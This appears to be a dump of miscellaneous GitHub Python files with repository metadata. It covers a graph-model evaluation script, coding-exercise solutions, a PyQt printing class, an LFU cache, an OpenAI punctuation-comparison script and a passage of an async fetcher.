accuracy_score(gt_user_user_labels, [int(ele) for ele in user_level_pathway_with_neg_labels])\n\n\ndef information_pathway_evaluation(preds, ground_truths):\n agg_acc = []\n for pred,ground_truth in zip(preds, ground_truths):\n agg_acc.append(accuracy_score(ground_truth.cpu().numpy().astype(int), pred.cpu().numpy().astype(int)))\n\n return mean(agg_acc)\n\n\ndef main(config):\n \n cached_datapath = os.path.join(config.cached_datapath,f\"cached_{config.community_aggregation_type}_{config.community_embedding_model_name}.pkl\") \n training_instances_path = os.path.join(config.info_pathway_instances_datapath, config.training_instances_filename)\n evaluation_instances_path = os.path.join(config.info_pathway_instances_datapath, config.training_instances_filename)\n \n training_community_features_path = os.path.join(config.comm_feats_datapath, config.training_comm_features)\n evaluation_community_features_path = os.path.join(config.comm_feats_datapath, config.eval_comm_features)\n \n training_article_features_path = os.path.join(config.article_features_datapath, config.training_article_features)\n evaluation_article_features_path = os.path.join(config.article_features_datapath, config.eval_article_features)\n \n modelname = f\"{config.community_aggregation_type}_{config.community_embedding_model_name}\"\n \n model_output_path = os.path.join(config.best_model_output_path, f\"{modelname}.pt\")\n\n training_instances, num_comm_nodes, num_article_nodes, metadata, hetero_validation_insts, hetero_testing_insts = prepare_training_data(training_instances_path, evaluation_instances_path, training_community_features_path, evaluation_community_features_path, training_article_features_path, evaluation_article_features_path, config.subgraph_min_size, config.subgraph_max_size, cached_datapath, overwrite=False)\n \n # subgraph_max_size = 25 #500\n # subgraph_min_size = 4\n\n test_results = {}\n \n print(\"Validation instances\", len(hetero_validation_insts))\n print(\"Testing instances\", len(hetero_testing_insts))\n model = utils.load_model(model_output_path)\n model = model.to(device)\n \n preds = []\n ground_truths = []\n \n val_avg_cc_f1 = []\n val_avg_cc_auc = []\n val_avg_cc_acc = []\n model.eval()\n with torch.no_grad():\n for sampled_data in tqdm(hetero_validation_insts):\n \n sampled_data.to(device)\n \n comm_to_comm_with_neg = sampled_data['community', 'interacts_with', 'community'].edge_labels\n pred_test_comm_comm_labels = sampled_data['community', 'interacts_with', 'community'].edge_labels_str\n comm_path_to_user_path_mapping = sampled_data['community', 'interacts_with', 'community'].comm_user_map\n gt_user_user_labels = sampled_data['community', 'interacts_with', 'community'].user_edge_labels\n gt_user_user_edges = sampled_data['community', 'interacts_with', 'community'].user_edge_labels_str\n \n pred_comm_to_comm_edges_w_neg = model(sampled_data).clamp(min=0,max=1)\n \n preds.append(pred_comm_to_comm_edges_w_neg)\n \n ground_truths.append(comm_to_comm_with_neg)\n \n val_cc_f1, val_cc_auc, val_cc_acc = cross_comm_evaluation(gt_user_user_edges, gt_user_user_labels, pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels, comm_path_to_user_path_mapping)\n val_avg_cc_f1.append(val_cc_f1)\n val_avg_cc_auc.append(val_cc_auc)\n val_avg_cc_acc.append(val_cc_acc)\n \n pred = torch.cat(preds, dim=0).cpu().numpy()\n ground_truth = torch.cat(ground_truths, dim=0).cpu().numpy()\n\n ipp_acc = information_pathway_evaluation(preds, ground_truths)\n roc_auc = roc_auc_score(ground_truth.reshape(len(ground_truth), 1), pred.reshape(len(ground_truth), 1))\n micro_f1 = f1_score(ground_truth.astype(int), pred.astype(int), average=\"micro\")\n macro_f1 = f1_score(ground_truth.astype(int), pred.astype(int), average=\"macro\")\n avg_pr = average_precision_score(ground_truth.astype(int), pred.astype(int))\n precision, recall, thresholds = precision_recall_curve(ground_truth.astype(int), pred.astype(int))\n aupr = auc(recall, precision)\n \n print(f\"Validation XCOMM AUC: {sum(val_avg_cc_f1)/len(val_avg_cc_f1):.4f}\")\n print(f\"Validation XCOMM micro f1: {sum(val_avg_cc_auc)/len(val_avg_cc_auc):.4f}\")\n print(f\"Validation XCOMM IPP Accuracy: {sum(val_avg_cc_acc)/len(val_avg_cc_acc):.4f}\")\n \n print(f\"Validation AUC: {roc_auc:.4f}\")\n print(f\"Validation micro f1: {micro_f1:.4f}\")\n print(f\"Validation macro f1: {macro_f1:.4f}\")\n print(f\"Validation IPP Accuracy: {ipp_acc:.4f}\")\n print(\"--------- Imbalanced Data Metrics ---------\")\n print(f\"Validation Avg. Precision-Recall: {avg_pr:.4f}\")\n print(f\"Validation AUPR: {aupr:.4f}\")\n \n best_roc_auc = (sum(val_avg_cc_f1)/len(val_avg_cc_f1))\n \n testing_preds = []\n testing_ground_truths = []\n \n test_avg_cc_f1 = []\n test_avg_cc_auc = []\n test_avg_cc_acc = []\n for sampled_data in tqdm(hetero_testing_insts):\n sampled_data.to(device)\n \n comm_to_comm_with_neg = sampled_data['community', 'interacts_with', 'community'].edge_labels\n pred_test_comm_comm_labels = sampled_data['community', 'interacts_with', 'community'].edge_labels_str\n comm_path_to_user_path_mapping = sampled_data['community', 'interacts_with', 'community'].comm_user_map\n gt_user_user_labels = sampled_data['community', 'interacts_with', 'community'].user_edge_labels\n gt_user_user_edges = sampled_data['community', 'interacts_with', 'community'].user_edge_labels_str\n \n pred_comm_to_comm_edges_w_neg = model(sampled_data).clamp(min=0,max=1)\n testing_preds.append(pred_comm_to_comm_edges_w_neg)\n testing_ground_truths.append(comm_to_comm_with_neg)\n \n test_cc_f1, test_cc_auc, test_cc_acc = cross_comm_evaluation(gt_user_user_edges, gt_user_user_labels, pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels, comm_path_to_user_path_mapping)\n test_avg_cc_f1.append(test_cc_f1)\n test_avg_cc_auc.append(test_cc_auc)\n test_avg_cc_acc.append(test_cc_acc)\n \n testing_pred = torch.cat(testing_preds, dim=0).cpu().numpy()\n testing_ground_truth = torch.cat(testing_ground_truths, dim=0).cpu().numpy()\n \n # print(set(list(testing_pred.astype(int))), set(list(testing_ground_truth.astype(int))))\n testing_ipp_acc = information_pathway_evaluation(testing_preds, testing_ground_truths)\n testing_roc_auc = roc_auc_score(testing_ground_truth.reshape(len(testing_ground_truth), 1), testing_pred.reshape(len(testing_ground_truth), 1))\n testing_micro_f1 = f1_score(testing_ground_truth.astype(int), testing_pred.astype(int), average=\"micro\")\n testing_macro_f1 = f1_score(testing_ground_truth.astype(int), testing_pred.astype(int), average=\"macro\")\n testing_avg_pr = average_precision_score(ground_truth.astype(int), pred.astype(int))\n testing_precision, testing_recall, testing_thresholds = precision_recall_curve(ground_truth.astype(int), pred.astype(int))\n testing_aupr = auc(testing_recall, testing_precision)\n \n test_results = {\n \"Testing XCOMM AUC\": sum(test_avg_cc_f1)/len(test_avg_cc_f1),\n \"Testing XCOMM micro f1\": sum(test_avg_cc_auc)/len(test_avg_cc_auc),\n \"Testing XCOMM IPP Accuracy\": sum(test_avg_cc_acc)/len(test_avg_cc_acc),\n \"Testing AUC\": testing_roc_auc,\n \"Testing micro f1\": testing_micro_f1,\n \"Testing macro f1\": testing_macro_f1,\n \"Testing IPP Accuracy\": testing_ipp_acc,\n \"Validation Avg. Precision-Recall\": testing_avg_pr,\n \"Validation AUPR\": testing_aupr\n }\n\n \n print(f\"Final Testing Results: {modelname}\")\n print(\"--------------------------\")\n copy_paste_string = []\n for test_result in test_results:\n print(f\"{test_result}: {test_results[test_result]}\")\n copy_paste_string.append(str(test_results[test_result]))\n print(\"--------------------------\")\n print(\",\".join(copy_paste_string))\n print(\"--------------------------\")\n \n bl_ground_truths = []\n for sampled_data in tqdm(hetero_testing_insts):\n bl_ground_truths.append(sampled_data['community', 'interacts_with', 'community'].edge_labels)\n \n bl_agg_gts = torch.cat(bl_ground_truths, dim=0).cpu().tolist()\n print(\"BL Always Negative\", accuracy_score(bl_agg_gts, [0] * len(bl_agg_gts)))\n print(\"--------------------------\")\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Read configuration JSON file')\n parser.add_argument('config', type=str, help='Path to the configuration JSON file')\n args = parser.parse_args()\n\n config = utils.read_config(args.config)\n config.update(args.__dict__)\n config = argparse.Namespace(**config)\n global device\n device = config.cuda_device\n main(config)","repo_name":"ataylor24/Stealth","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":11111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28730575785","text":"input_str = \"\"\"The First-ever Open-water Beluga Sanctuary will Welcome to\nAdorable Whales in June,Adorable beluga whales are a pupular attraction to aquariums\naround the world,but like many other wild animals,they also risk losing their habitats\ndue to human intervention such as population growth,new buildings along the coastline,\nfishing,and other problems that sea creatures face.\"\"\"\ndef calc_statistic(input_str): # 计算英文字母出现的频率\n result = [0] * 26 # 构建结果列表。26个0组成的列表\n for c in input_str: # 对于字符串中的每个字符\n if c.isalpha(): # 判断是否为字母\n c = c.lower() # 统一转换为小写\n index = ord(c) - ord('a') # 计算出其相对a的位置\n result[index] = result[index] + 1 # 将出现次数加1\n for ele in range(0,26): # \n c = chr(ord('a') + ele)\n print(\"[%s] 出现的次数为 %d\" % (c,result[ele]))\n\ncalc_statistic(input_str)\n","repo_name":"Tonynovtop/Learning-Python","sub_path":"cal_statisticalpha.py","file_name":"cal_statisticalpha.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29514638230","text":"# https://open.kattis.com/problems/ptice\nadrian_seq = [\"A\", \"B\", \"C\"]\nbruno_seq = [\"B\", \"A\", \"B\", \"C\"]\ngoran_seq = [\"C\", \"C\", \"A\", \"A\", \"B\", \"B\"]\n\ndef applicant(seq: list):\n n = 0\n while n < len(seq):\n yield seq[n]\n n += 1\n yield next(applicant(seq))\n\nadrian = applicant(adrian_seq)\nbruno = applicant(bruno_seq)\ngoran = applicant(goran_seq)\n\nn_questions = input()\nexam = input()\nexam.split()","repo_name":"Menkeyshow/KattisProblemArchive","sub_path":"unsolved/ptice.py","file_name":"ptice.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27288168188","text":"from collections import deque\n\nN, K = map(int, input().split())\nq = deque(_ for _ in range(1, N+1))\nr = []\n\n\ndef josephus():\n p = 0\n while len(q):\n for _ in range(len(q) - 1):\n left = q.popleft()\n q.append(left)\n p += 1\n\n print(q)\n\n if p == K:\n r.append(q.pop())\n\n\nprint(r)\n","repo_name":"o-henry/ps","sub_path":"a/1158.py","file_name":"1158.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71506967517","text":"import sys\n\nfrom PyQt5 import QtCore, QtWidgets, QtGui, QtPrintSupport\n\n\nclass PrintList:\n def __init__(self):\n self.printer = QtPrintSupport.QPrinter()\n self.headerFont = QtGui.QFont(\"Arial\", pointSize=10, weight=QtGui.QFont.Weight.Bold)\n self.bodyFont = QtGui.QFont(\"Arial\", pointSize=10)\n self.footerFont = QtGui.QFont(\"Arial\", pointSize=9, italic=True)\n self.headerFlags = QtCore.Qt.AlignmentFlag.AlignHCenter | QtCore.Qt.TextFlag.TextWordWrap\n self.bodyFlags = QtCore.Qt.TextFlag.TextWordWrap\n self.footerFlags = QtCore.Qt.AlignmentFlag.AlignHCenter | QtCore.Qt.TextFlag.TextWordWrap\n color = QtGui.QColor(QtGui.QColorConstants.Black)\n self.headerPen = QtGui.QPen(color, 2)\n self.bodyPen = QtGui.QPen(color, 1)\n self.margin = 5\n self._resetData()\n\n def _resetData(self):\n self.headers = None\n self.columnWidths = None\n self.data = None\n self._brush = QtCore.Qt.BrushStyle.NoBrush\n self._currentRowHeight = 0\n self._currentPageHeight = 0\n self._headerRowHeight = 0\n self._footerRowHeight = 0\n self._currentPageNumber = 1\n self._painter = None\n\n def printData(self):\n self._painter = QtGui.QPainter()\n self._painter.begin(self.printer)\n self._painter.setBrush(self._brush)\n if self._headerRowHeight == 0:\n self._painter.setFont(self.headerFont)\n self._headerRowHeight = self._calculateRowHeight(self.columnWidths, self.headers)\n if self._footerRowHeight == 0:\n self._painter.setFont(self.footerFont)\n self._footerRowHeight = self._calculateRowHeight([self.printer.width()], \"Страница\")\n for i in range(len(self.data)):\n height = self._calculateRowHeight(self.columnWidths, self.data[i])\n if self._currentPageHeight + height > self.printer.height() - self._footerRowHeight - 2 * self.margin:\n self._printFooterRow()\n self._currentPageHeight = 0\n self._currentPageNumber += 1\n self.printer.newPage()\n if self._currentPageHeight == 0:\n self._painter.setPen(self.bodyPen)\n self._painter.setFont(self.bodyFont)\n self.printRow(self.columnWidths, self.data[i], height, self.bodyFlags)\n\n self._printFooterRow()\n self._painter.end()\n self._resetData()\n\n def _calculateRowHeight(self, widths, cellData):\n height = 0\n for i in range(len(widths)):\n r = self._painter.boundingRect(0, 0, widths[i] - 2 * self.margin, 50, QtCore.Qt.TextFlag.TextWordWrap,\n str(cellData[i]))\n h = r.height() + 2 * self.margin\n if height < h:\n height = h\n\n return height\n\n def printRow(self, widths, cellData, height, flags):\n x = 0\n for i in range(len(widths)):\n self._painter.drawText(x + self.margin, self._currentPageHeight + self.margin, widths[i] - self.margin,\n height - 2 * self.margin,\n flags, str(cellData[i]))\n self._painter.drawRect(x, self._currentPageHeight, widths[i], height)\n x += widths[i]\n self._currentPageHeight += height\n\n def _printFooterRow(self):\n self._painter.setFont(self.footerFont)\n self._painter.drawText(self.margin, self.printer.height() - self._footerRowHeight - self.margin,\n self.printer.width() - 2 * self.margin, self._footerRowHeight - 2 * self.margin,\n self.footerFlags, \"Страница \" + str(self._currentPageNumber))\n\n\napp = QtWidgets.QApplication(sys.argv)\npl = PrintList()\n# Если нужен формат PDF\n# раскоментировать строку ниже:\npl.printer.setOutputFileName(\"output.pdf\")\ndata = []\n# pl.headerFlags = QtCore.Qt.AlignmentFlag.AlignCenter | QtCore.Qt.TextFlag.TextWordWrap\nfor b in range(1, 101):\n data.append([b, b ** 2, b ** 3])\npl.data = data\npl.columnWidths = [100, 100, 200]\npl.headers = [\"Число\", \"Квадрат\", \"Куб\"]\npl.printData()\n","repo_name":"D4Gj/lessons","sub_path":"Lesson_44/printList.py","file_name":"printList.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73660807519","text":"import csv\nimport difflib\n\nimport django\ndjango.setup()\nimport typer\nimport json\nfrom sefaria.model import *\nfrom sefaria.utils.hebrew import strip_cantillation\nimport random\nimport os\nfrom langchain.chat_models import ChatOpenAI\nimport openai\napi_key = os.getenv(\"OPENAI_API_KEY\")\n\n\nseed_value = 613\nrandom.seed(seed_value)\n\n# def create_data(output_training_filename: str, output_validation_filename: str):\n# all_samples = []\n# for masechet in masechtot_ordered:\n# print(\"creating data from Masechet \" + masechet)\n# all_segment_refs = Ref(masechet).all_segment_refs()\n# for segment_ref in all_segment_refs:\n# non_punctuated = segment_ref.text('he', \"William Davidson Edition - Aramaic\").text\n# punctuated = strip_cantillation(segment_ref.text('he').text, strip_vowels=True)\n# steinsalz = Ref(\"Steinsaltz on \" + segment_ref.normal()).text('he').text\n# all_samples.append(create_new_context(task_desciption, non_punctuated, steinsalz, punctuated))\n# if masechet == last_masechet:\n# break\n#\n# #get only limited num of samples\n# samples_trimmed = []\n# samples_trimmed = random.sample(all_samples, sample_size)\n#\n# # Calculate the number of items for training\n# num_train = int(len(samples_trimmed) * train_proportion)\n#\n# # Use random.sample to partition the list according to the seed\n# train_samples = random.sample(samples_trimmed, num_train)\n# validation_samples = [item for item in samples_trimmed if item not in train_samples]\n#\n# with open(output_training_filename, 'w', encoding='utf-8') as jsonl_file:\n# for json_obj in train_samples:\n# # Use ensure_ascii=False to encode Unicode characters\n# json_line = json.dumps(json_obj, ensure_ascii=False)\n# jsonl_file.write(json_line + '\\n')\n# with open(output_validation_filename, 'w', encoding='utf-8') as jsonl_file:\n# for json_obj in validation_samples:\n# # Use ensure_ascii=False to encode Unicode characters\n# json_line = json.dumps(json_obj, ensure_ascii=False)\n# jsonl_file.write(json_line + '\\n')\n#\n#\n# print(\"TRAINING SAMPLES: \" + str(len(train_samples)))\n# print(\"VALIDATION SAMPLES: \" + str(len(validation_samples)))\ndef write_lists_to_csv(list1, list2, filename, header1, header2):\n # Combine the lists into a list of tuples\n data = list(zip(list1, list2))\n\n # Open the CSV file in write mode\n with open(filename, 'w', newline='', encoding='utf-8') as csvfile:\n # Create a CSV writer\n csvwriter = csv.writer(csvfile)\n\n # Write the headers\n csvwriter.writerow([header1, header2])\n\n # Write the data\n csvwriter.writerows(data)\ndef read_json_lines_to_list(file_path):\n data_list = []\n\n with open(file_path, 'r', encoding='utf-8') as json_file:\n for line in json_file:\n try:\n data = json.loads(line)\n data_list.append(data)\n except json.JSONDecodeError as e:\n print(f\"Error decoding JSON: {e}\")\n\n return data_list\n\n return data_list\n\ndef get_response_openai(sample, model_name):\n response = openai.ChatCompletion.create(\n model=model_name,\n messages=[\n {\n \"role\": \"system\",\n \"content\": sample[\"messages\"][0][\"content\"]\n },\n {\n \"role\": \"user\",\n \"content\": sample[\"messages\"][1][\"content\"]\n }\n\n ],\n temperature=1,\n max_tokens=256,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n # print(response)\n inference = response[\"choices\"][0][\"message\"][\"content\"]\n return(inference)\n\n\n print() # Move to the next line\nif __name__ == '__main__':\n # typer.run(visualize)\n print(\"hi\")\n model_name = \"ft:gpt-3.5-turbo-0613:sefaria:he-punct:8ClpgehI\"\n golden_standard = read_json_lines_to_list('../output/gpt_punctuation_validation.jsonl')\n golden_standard = random.sample(golden_standard, 50)\n inferred = []\n for sample in golden_standard:\n inferred.append(get_response_openai(sample, model_name))\n golden_standard_valids = [sample[\"messages\"][2][\"content\"] for sample in golden_standard]\n # golden_standard_valids_steinsaltz = [sample[\"messages\"][1][\"content\"].split('\"steinsaltz\":')[1][:-1] for sample in golden_standard]\n write_lists_to_csv(golden_standard_valids, inferred, '../output/discrepancies_visualization.csv', \"Gold\", \"Inferred\")\n\n\n\n\n\n","repo_name":"Sefaria/LLM","sub_path":"talmud_punctuation/fine_tune/project_scripts/compare_gold_with_inferred.py","file_name":"compare_gold_with_inferred.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"6025442560","text":"class Solution:\n def nextGreatestLetter(self, letters: List[str], target: str) -> str:\n if letters[-1] <= target:\n return letters[0]\n \n l = 0\n r = len(letters) - 1\n ans = float(\"inf\")\n while l <= r:\n mid = (l + r)//2\n if letters[mid] > target:\n ans = min(mid, ans)\n r = mid - 1\n else:\n l = mid + 1\n return letters[ans]\n \n ","repo_name":"sugeeth14/leetcode-problems","sub_path":"744-find-smallest-letter-greater-than-target/744-find-smallest-letter-greater-than-target.py","file_name":"744-find-smallest-letter-greater-than-target.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74158023837","text":"from glob import glob\n\n\ndef read_stuff(fname):\n\n with open(fname, 'r') as fd:\n data = fd.readlines()\n assert len(data) == 1\n\n return data[0].strip()\n\n\nfor fname in glob('/proc/[0-9]*/oom_adj'):\n\n # Values of oom_adj :\n # -17 = immune to oom killer\n # -16 = very unlikely to be killed\n # ...\n # +15 = very likely to be killed\n\n oom_adj = int(read_stuff(fname))\n if oom_adj >= 0:\n continue\n\n cmdline = read_stuff(fname.replace('oom_adj', 'cmdline')).split('\\0')[0]\n\n print(f'{cmdline} -> {oom_adj}')\n","repo_name":"dargor/system-tools","sub_path":"oom_adj.py","file_name":"oom_adj.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11622487817","text":"#-*- encoding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError, RedirectWarning, ValidationError\n\n#PARA FECHAS\nfrom datetime import datetime, timedelta\nfrom pytz import timezone\nimport pytz\nimport time\nimport logging\n_logger = logging.getLogger(__name__)\n#OTROS\nimport re\n\nclass ReportStockRule(models.AbstractModel):\n _name = 'report.l10n_mx_payroll.report_payroll_list'\n _description = 'Payroll List Report'\n \n \n @api.model\n def _get_report_values(self, docids, data={}):\n rec_ids = data.get('active_ids', [])\n payroll_list = self.env['hr.payslip.run'].browse(rec_ids)\n #payroll_list = self.env['hr.payslip.run'].browse(docids)\n _logger.info(\"data: %s\" % data)\n _logger.info(\"payroll_list: %s\" % payroll_list)\n \n if not payroll_list.slip_ids.filtered(lambda x: x.state in ('draft','verify','done')):\n raise UserError(_(\"No existen Nóminas para la Impresión del Reporte.\"))\n \n # Departamentos\n if data.get('departments', False):\n departments = \"and contract.department_id in (%s)\" % str(data.get('departments')).replace('[','').replace(']','')\n department_ids = data.get('departments')\n else:\n departments = \"and contract.department_id is not null\"\n department_ids = False\n \n # Empleados\n if data.get('employees', False):\n employees = \"and contract.employee_id in (%s)\" % str(data.get('employees')).replace('[','').replace(']','')\n employee_ids = data.get('employees')\n else:\n employees = \"\"\n employee_ids = False\n _logger.info(\"employee_ids: %s\" % employee_ids)\n \n # Puestos de Trabajo \n if data.get('jobs', False):\n jobs = \"and contract.job_id in (%s)\" % str(data.get('jobs')).replace('[','').replace(']','')\n job_ids = data.get('jobs')\n else:\n jobs = \"\"\n job_ids = False\n _logger.info(\"job_ids: %s\" % job_ids)\n \n # Analiticas\n if data.get('analytic_accounts', False):\n analytic_accounts = \"and contract.analytic_account_id in (%s)\" % str(data.get('analytic_accounts')).replace('[','').replace(']','')\n analytic_account_ids = self.env['account.analytic.account'].browse(data.get('analytic_accounts'))\n else:\n analytic_accounts = \"\"\n analytic_account_ids = False\n _logger.info(\"analytic_account_ids: %s\" % job_ids)\n \n # Tipo de Empleado\n if data.get('tipo_empleado', False) != 'all':\n tipo_empleado = \"and contract.sindicalizado='%s'\" % data.get('tipo_empleado')\n tipo_empleados = [data.get('tipo_empleado')]\n else:\n tipo_empleado = \"\"\n tipo_empleados = False\n \n date_from = payroll_list.date_start.strftime('%d/%m/%Y')\n date_to = payroll_list.date_end.strftime('%d/%m/%Y')\n total_no_empleados = 0 #No. de empleados\n \n self.env.cr.execute(\"\"\"\n select distinct contract.id\n from hr_payslip slip\n inner join hr_contract contract on slip.contract_id=contract.id %s %s %s %s %s\n where slip.payslip_run_id=%s and slip.state in ('draft','verify','done');\n \"\"\" % (departments, employees, jobs, \n tipo_empleado, analytic_accounts, payroll_list.id))\n \n contract_ids = [item['id'] for item in self.env.cr.dictfetchall()]\n if not contract_ids:\n raise ValidationError(_(\"No se encontraton Nóminas con los parámetros indicados.\"))\n #raise ValidationError('contract_ids: %s' % contract_ids)\n self.env.cr.execute(\"\"\"\n select distinct contract.department_id\n from hr_payslip slip\n inner join hr_contract contract on slip.contract_id=contract.id and contract.id in (%s)\n where slip.payslip_run_id=%s and slip.state in ('draft','verify','done');\n \"\"\" % (','.join(str(_c) for _c in contract_ids), payroll_list.id))\n \n department_ids = (x[0] for x in self.env.cr.fetchall())\n if not department_ids:\n raise ValidationError(_(\"No se encontraton Nóminas con los parámetros indicados.\"))\n \n departments = self.env['hr.department'].browse(department_ids)\n conceptos_por_departamento = {}\n for department in departments:\n # Debug\n _logger.info(\"Procesando: [%s] %s\" % (department.id, department.complete_name))\n # Fin Debug\n conceptos_por_departamento[department.id] = {\n 'percepciones' : self.get_payroll_lines(\n payroll_list=payroll_list, \n department=department, \n contracts=contract_ids,\n tipo='percepciones'),\n 'deducciones' : self.get_payroll_lines(\n payroll_list=payroll_list, \n department=department, \n contracts=contract_ids,\n tipo='deducciones'),\n }\n _logger.info(\"\\nconceptos_por_departamento[department.id]: %s\" % conceptos_por_departamento[department.id])\n #raise ValidationError(\"Pausa\")\n # Debug\n #for x in conceptos_por_departamento.keys():\n # _logger.info(\"\\nconceptos_por_departamento[%s]: %s\" % (x, conceptos_por_departamento[x]))\n # Fin Debug\n conceptos_todos_departamentos = {\n 'percepciones' : self.get_payroll_lines(\n payroll_list=payroll_list, \n department=departments, \n contracts=contract_ids,\n tipo='percepciones'),\n 'deducciones' : self.get_payroll_lines(\n payroll_list=payroll_list, \n department=departments, \n contracts=contract_ids,\n tipo='deducciones'),\n }\n \n # Debug\n #_logger.info(\"\\nconceptos_todos_departamentos: %s\" % conceptos_todos_departamentos)\n # Fin Debug\n _logger.info(\"contract_ids: %s\" % contract_ids)\n data = {\n 'docs' : payroll_list,\n 'departments' : departments,\n 'contracts' : contract_ids,\n 'date_from' : date_from,\n 'date_to' : date_to,\n 'conceptos_por_departamento' : conceptos_por_departamento,\n 'conceptos_todos_departamentos' : conceptos_todos_departamentos,\n }\n #raise ValidationError(\"Pausa\")\n return data\n\n\n def get_payroll_lines(self, payroll_list=False, department=False, contracts=False, tipo=False):\n conceptos = self.env['hr.payslip.line'].browse()\n _logger.info(\"contracts: %s - tipo: %s\" % (contracts, tipo))\n for nomina in payroll_list.slip_ids.filtered(lambda w: w.contract_id.id in contracts):\n if nomina.contract_id.department_id.id not in department.ids:\n _logger.info(\"saltando...\")\n continue\n if tipo=='percepciones':\n conceptos += nomina.percepciones_ids + nomina.otrospagos_ids.filtered(lambda w: w.salary_rule_id.tipootropago_id.code!='002')\n elif tipo=='deducciones':\n conceptos += nomina.deducciones_ids + nomina.otrospagos_ids.filtered(lambda w: w.salary_rule_id.tipootropago_id.code=='002' and not w.no_suma)\n \n data ={}\n for line in conceptos:\n if line.salary_rule_id.id not in data.keys():\n data[line.salary_rule_id.id] = {'name' : line.name,\n 'salary_rule_id' : line.salary_rule_id,\n 'total': (line.total * -1.0) if tipo=='deducciones' and line.salary_rule_id.tipootropago_id.code=='002' else line.total}\n else:\n data[line.salary_rule_id.id]['total'] += (line.total * -1.0) if tipo=='deducciones' and line.salary_rule_id.tipootropago_id.code=='002' else line.total\n return data\n \n \n","repo_name":"germanponce/odoo-mexico-payroll-ce-v14","sub_path":"l10n_mx_payroll/report/report_payroll_list.py","file_name":"report_payroll_list.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4666282447","text":"class LFUCache:\n\n def __init__(self, capacity: int):\n self.tracker = dict()\n self.freqQueues = dict()\n self.counter = [0 for i in range(100001)]\n self.freqQueues[1] = []\n self.lowFreq = 1\n self.currSize = 0\n self.maxSize = capacity\n\n def get(self, key: int) -> int:\n if key not in self.tracker: return -1\n self.counter[key] += 1\n if self.counter[key] not in self.freqQueues: self.freqQueues[self.counter[key]] = []\n self.freqQueues[self.counter[key]].append(key)\n return self.tracker[key]\n\n def put(self, key: int, value: int) -> None:\n if key not in self.tracker:\n if self.maxSize == 0: return\n if self.currSize == self.maxSize:\n found = False\n while not found:\n curr = self.freqQueues[self.lowFreq]\n while not found and curr:\n candidate = curr.pop(0)\n if self.counter[candidate] != self.lowFreq: continue\n del self.tracker[candidate]\n self.counter[candidate] = 0\n found = True\n if not found: self.lowFreq += 1\n else:\n self.currSize += 1\n self.lowFreq = 1\n self.counter[key] += 1\n if self.counter[key] not in self.freqQueues: self.freqQueues[self.counter[key]] = []\n self.freqQueues[self.counter[key]].append(key)\n self.tracker[key] = value\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","repo_name":"yiiilonggg/LeetCode","sub_path":"460. LFU Cache/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38887391781","text":"from src.pkg_algorithms import clu_grad_v2 as cgp\nfrom src import config as cfg\nimport so4gp as sgp\n\n\ndef compare_gps(clustered_gps, f_path, min_sup):\n same_gps = []\n miss_gps = []\n str_gps, real_gps = sgp.graank(f_path, min_sup, return_gps=True)\n for est_gp in clustered_gps:\n check, real_sup = sgp.contains_gp(est_gp, real_gps)\n # print([est_gp, est_gp.support, real_sup])\n if check:\n same_gps.append([est_gp, est_gp.support, real_sup])\n else:\n miss_gps.append(est_gp)\n # print(same_gps)\n print(str_gps)\n return same_gps, miss_gps\n\n\ndef run_comparison():\n output, est_gps = cgp.clugps(f_path=cfg.DATASET, min_sup=cfg.MIN_SUPPORT, return_gps=True)\n print(output)\n\n # Compare inferred GPs with real GPs\n hit_gps, miss_gps = compare_gps(est_gps, cfg.DATASET, cfg.MIN_SUPPORT)\n d_gp = sgp.DataGP(cfg.DATASET, cfg.MIN_SUPPORT)\n for gp in miss_gps:\n print(gp.print(d_gp.titles))\n\n\n# run_comparison()\n","repo_name":"owuordickson/spectral_gp","sub_path":"analysis/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12407707016","text":"import asyncio\nimport httpx\nimport pandas as pd\nfrom time import sleep, time\n\nclass AsyncPaginatedFetcher():\n def __init__(self, base_url, query, total_results, n_workers=10, results_per_page=20, result_handler=callable):\n self.n_workers = n_workers\n self.base_url = base_url\n self.total_pages = total_results // results_per_page\n self.results_per_page = results_per_page\n self.results_processed = 0\n self.total_results = total_results\n self.current_page = 0\n self.query = query\n self.query_text = query['queries'][0]['value']\n self.result_handler = result_handler\n self.queue = asyncio.Queue()\n self.failed_writes: pd.DataFrame = pd.DataFrame({'id': [], 'onestop_query': [], 'exception': []})\n\n def _populate_queue(self, queue):\n _total_pages = self.total_pages\n while _total_pages > 0:\n _total_pages -= 1\n page = {\n \"max\": self.results_per_page,\n \"offset\": (_total_pages) * self.results_per_page\n }\n _query = self.query.copy()\n _query['page'] = page\n 